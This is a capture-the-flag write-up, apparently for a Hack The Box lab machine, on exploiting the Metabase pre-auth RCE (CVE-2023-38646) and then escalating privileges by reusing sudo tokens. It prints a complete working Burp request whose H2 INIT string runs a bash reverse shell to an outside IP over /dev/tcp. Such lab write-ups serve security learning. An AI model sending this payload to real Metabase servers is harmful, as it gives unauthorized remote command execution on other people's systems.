The official writeup here is quite clear. I followed a similar path to get the flags. However, I was not that luck to meet the right script to get the reverse shell. Since the toppest script regarding the Metabase Pre-Auth RCE (CVE-2023-38646) used ‘“engine”: “h2”’ in the script which led to an error in the machine.

After a few searches, I found this article where I realized that “postgres” is another engine that can be used in getting an reverse shell from metabase. However, this article doesn’t give out the codes they used directly. I modified this file and sent it to the machine with burp suite repeater to get a reverse shell from the target machine.

Here’s the post I used in Burp Suite.

POST /api/setup/validate HTTP/1.1
Host: metabase.apethanto.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 441
Origin: http://metabase.apethanto.htb
Connection: close
Referer: http://metabase.apethanto.htb/auth/login
Cookie: metabase.DEVICE=f3ea3cf5-2c76-4908-a5d9-0f379a5ec7e4

{"token":"819139a8-1ce9-46f0-acf8-9b4fc0d1164b","details":{"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver","advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", cmd})\\;}$$\\;CALL SHELLEXEC('sh -i >& /dev/tcp/10.10.14.214/443 0>&1');"},"name":"x","engine":"postgres"}}

For privilege escalation, I noticed the routine of “expect” and “sudo” from the root user. However, I could not find a keyword to a valid PE path. After hours of wandering around, I started to check each result of linpeas.sh from the top down. Googling this “ptrace protection is disabled (0), so sudo tokens could be abused” line leads me to this sudo_inject GitHub page. The Hacktricks page of reusing-sudo-tokens is also helpful. I used exploit_v2.sh in the sudo inject GitHub page to get a root shell.